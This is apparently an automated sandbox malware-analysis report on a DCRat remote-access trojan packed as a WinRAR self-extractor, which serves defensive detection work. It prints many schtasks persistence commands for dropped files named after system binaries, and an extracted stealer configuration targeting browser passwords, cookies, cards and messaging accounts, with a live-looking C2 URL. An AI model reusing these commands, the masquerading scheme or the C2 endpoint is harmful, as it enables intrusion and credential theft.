Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1521601
MD5: 8a0082dc4822b5f82dee8be67d86d402
SHA1: aa50f62b0ad60570db6d854ba2618f25a2b95882
SHA256: 443b28843ef46edf389d28b02cb45b89ec6a871f87f5b8bbeee8bb5e1e609126
Tags: exe, user-jstrosch

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected DCRat
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8A0082DC4822B5F82DEE8BE67D86D402)
    • wscript.exe (PID: 7620 cmdline: "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7748 cmdline: C:\Windows\system32\cmd.exe /c ""C:\reviewDriverIntosessionnet\NRWB62aUrGQ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • comProviderServer.exe (PID: 7800 cmdline: "C:\reviewDriverIntosessionnet\comProviderServer.exe" MD5: DEF21977FE76F2744669724D9A26A39F)
          • schtasks.exe (PID: 7868 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7884 cmdline: schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7900 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7916 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Recovery\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7932 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7948 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7968 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7992 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8008 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8056 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\explorer.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8088 cmdline: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Public\Downloads\explorer.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8112 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\explorer.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8128 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8144 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8160 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8188 cmdline: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7260 cmdline: schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4236 cmdline: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7128 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 12 /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6920 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1088 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 5 /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 396 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5112 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6912 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7484 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7552 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7544 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7532 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6380 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5912 cmdline: schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 5 /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • wscript.exe (PID: 7640 cmdline: "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\file.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
{"SCRT": "{\"H\":\"(\",\"t\":\"!\",\"F\":\"%\",\"d\":\"|\",\"n\":\"#\",\"x\":\"^\",\"v\":\")\",\"P\":\">\",\"W\":\";\",\"y\":\"&\",\"c\":\"`\",\"G\":\"*\",\"i\":\" \",\"I\":\"$\",\"X\":\"~\",\"g\":\"@\",\"6\":\"-\",\"C\":\"<\",\"S\":\".\",\"3\":\",\",\"D\":\"_\"}", "PCRT": "{\"2\":\"#\",\"j\":\"^\",\"m\":\"(\",\"B\":\"$\",\"4\":\"_\",\"1\":\">\",\"i\":\"*\",\"U\":\")\",\"c\":\"-\",\"N\":\";\",\"Q\":\"`\",\"d\":\".\",\"z\":\"~\",\"V\":\"&\",\"T\":\",\",\"h\":\"!\",\"x\":\"%\",\"F\":\"@\",\"C\":\" \",\"X\":\"<\",\"R\":\"|\"}", "TAG": "", "MUTEX": "DCR_MUTEX-ihDIZlmnfSxSHTCWeZ2k", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%AppData% - Very Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://nezik.ru.swtest.ru/@=ETYmFWY1UWO", "H2": "http://nezik.ru.swtest.ru/@=ETYmFWY1UWO", "T": "0"}
Source | Rule | Description | Author | Strings
00000007.00000002.1397210421.0000000002E15000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000007.00000002.1397210421.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000007.00000002.1399409242.0000000012C8F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: comProviderServer.exe PID: 7800 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\reviewDriverIntosessionnet\comProviderServer.exe, ProcessId: 7800, TargetFilename: C:\Program Files\Windows Defender Advanced Threat Protection\services.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\explorer.exe'" /f, CommandLine: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\explorer.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\reviewDriverIntosessionnet\comProviderServer.exe" , ParentImage: C:\reviewDriverIntosessionnet\comProviderServer.exe, ParentProcessId: 7800, ParentProcessName: comProviderServer.exe, ProcessCommandLine: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\explorer.exe'" /f, ProcessId: 8056, ProcessName: schtasks.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7528, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe" , ProcessId: 7620, ProcessName: wscript.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /f, CommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\reviewDriverIntosessionnet\comProviderServer.exe" , ParentImage: C:\reviewDriverIntosessionnet\comProviderServer.exe, ParentProcessId: 7800, ParentProcessName: comProviderServer.exe, ProcessCommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /f, ProcessId: 8188, ProcessName: schtasks.exe
No Suricata rule has matched


AV Detection

Source: file.exe | Avira: detected
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\reviewDriverIntosessionnet\spoolsv.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\vEbYiTsQ2u.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\Public\Downloads\explorer.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\wscript.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\reviewDriverIntosessionnet\V50gFn.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Defender Advanced Threat Protection\services.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: 00000007.00000002.1399409242.0000000012C8F000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"SCRT": "{\"H\":\"(\",\"t\":\"!\",\"F\":\"%\",\"d\":\"|\",\"n\":\"#\",\"x\":\"^\",\"v\":\")\",\"P\":\">\",\"W\":\";\",\"y\":\"&\",\"c\":\"`\",\"G\":\"*\",\"i\":\" \",\"I\":\"$\",\"X\":\"~\",\"g\":\"@\",\"6\":\"-\",\"C\":\"<\",\"S\":\".\",\"3\":\",\",\"D\":\"_\"}", "PCRT": "{\"2\":\"#\",\"j\":\"^\",\"m\":\"(\",\"B\":\"$\",\"4\":\"_\",\"1\":\">\",\"i\":\"*\",\"U\":\")\",\"c\":\"-\",\"N\":\";\",\"Q\":\"`\",\"d\":\".\",\"z\":\"~\",\"V\":\"&\",\"T\":\",\",\"h\":\"!\",\"x\":\"%\",\"F\":\"@\",\"C\":\" \",\"X\":\"<\",\"R\":\"|\"}", "TAG": "", "MUTEX": "DCR_MUTEX-ihDIZlmnfSxSHTCWeZ2k", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%AppData% - Very Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://nezik.ru.swtest.ru/@=ETYmFWY1UWO", "H2": "http://nezik.ru.swtest.ru/@=ETYmFWY1UWO", "T": "0"}
Source: file.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.5% probability
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | Joe Sandbox ML: detected
Source: C:\reviewDriverIntosessionnet\spoolsv.exe | Joe Sandbox ML: detected
Source: C:\Users\Public\Downloads\explorer.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | Joe Sandbox ML: detected
Source: C:\Users\user\wscript.exe | Joe Sandbox ML: detected
Source: C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender Advanced Threat Protection\services.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe | Joe Sandbox ML: detected
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\services.exe
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\c5b4cb5e9653cc
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Directory created: C:\Program Files\Windows Sidebar\WmiPrvSE.exe
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Directory created: C:\Program Files\Windows Sidebar\24dbde2999530e
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Directory created: C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Directory created: C:\Program Files\MSBuild\48b6e448d1d68f
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: file.exe
Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll | source: comProviderServer.exe, 00000007.00000002.1422929652.000000001BD60000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb | source: comProviderServer.exe, 00000007.00000002.1422929652.000000001BD60000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B8A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B9B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00BAAAA8 FindFirstFileExA
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | File opened: C:\Users\user
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | File opened: C:\Users\user\AppData\Local
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | File opened: C:\Users\user\AppData
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | File opened: C:\Users\user\Desktop\desktop.ini

Networking

Source: Malware configuration extractor | URLs: http://nezik.ru.swtest.ru/@=ETYmFWY1UWO
Source: comProviderServer.exe, 00000007.00000002.1397210421.0000000002E15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

          System Summary

          barindex
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,1_2_00B8718C
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Windows\ELAMBKUP\StartMenuExperienceHost.exeJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Windows\ELAMBKUP\55b276f4edf653Jump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8857B1_2_00B8857B
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B970BF1_2_00B970BF
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BAD00E1_2_00BAD00E
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8407E1_2_00B8407E
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BB11941_2_00BB1194
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8E2A01_2_00B8E2A0
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B832811_2_00B83281
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA02F61_2_00BA02F6
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B966461_2_00B96646
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B827E81_2_00B827E8
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B937C11_2_00B937C1
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA473A1_2_00BA473A
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA070E1_2_00BA070E
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8E8A01_2_00B8E8A0
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8F9681_2_00B8F968
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA49691_2_00BA4969
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B93A3C1_2_00B93A3C
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B96A7B1_2_00B96A7B
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BACB601_2_00BACB60
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA0B431_2_00BA0B43
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B95C771_2_00B95C77
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9FDFA1_2_00B9FDFA
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8ED141_2_00B8ED14
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B93D6D1_2_00B93D6D
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8BE131_2_00B8BE13
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8DE6C1_2_00B8DE6C
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B85F3C1_2_00B85F3C
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA0F781_2_00BA0F78
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FC5F07_2_00007FFAAC3FC5F0
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FAA8D7_2_00007FFAAC3FAA8D
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FAF087_2_00007FFAAC3FAF08
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FAF587_2_00007FFAAC3FAF58
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FC7E07_2_00007FFAAC3FC7E0
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3F2BF07_2_00007FFAAC3F2BF0
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3F9DA17_2_00007FFAAC3F9DA1
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FAF357_2_00007FFAAC3FAF35
